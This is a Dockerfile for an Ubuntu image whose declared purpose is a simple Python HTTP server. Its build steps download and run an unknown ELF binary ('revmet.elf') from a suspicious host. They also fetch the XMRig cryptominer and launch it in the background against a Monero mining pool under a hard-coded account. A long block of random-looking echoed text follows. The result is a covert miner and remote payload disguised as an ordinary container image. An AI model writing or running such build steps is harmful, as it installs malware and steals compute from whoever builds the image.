FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo DCcyrer028JUIKbp7XH6O96c4hrOe4ux sYfBRZRlrNV6mEVEwtG1hZAJQEuVuz4Q OBBk6PCgEQHvPEeyhb1puChmdSQT3wgX a8duP1kvxywGBtKllyQD4YclXPhiq4ef wO1bGP2RuZ2vTw3UYsKJU2nsqdUGToPo K2srlYZwf7jRDQGWliYpWdRBTzkHpvbm Cj1xzWZw20H1eut9Se00DQAnlhatwKZH FkrqkUgKKEKUP5ypFvc6yn6N6MbtYDLz X9uRhbAH2nSM2CNorfnkx8iaXI1QVoJE qQDYgRzydvVwHbXxV6Cieln5ktvJWpeY fY38sozVHuqpkX0vjskftsC0WZlO0Lmh eLNIYSd1rvpfwh22A9fIkagj1OEc6gX1 rH2LlsJYXkgpy07w7nvJvwOmRs0borMf Uml3udqS5VwPFyrmLz0Vax0kGUsp71w2 eoRZCHtwOCKXDhhZBuNwdr3U0fatNppe DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]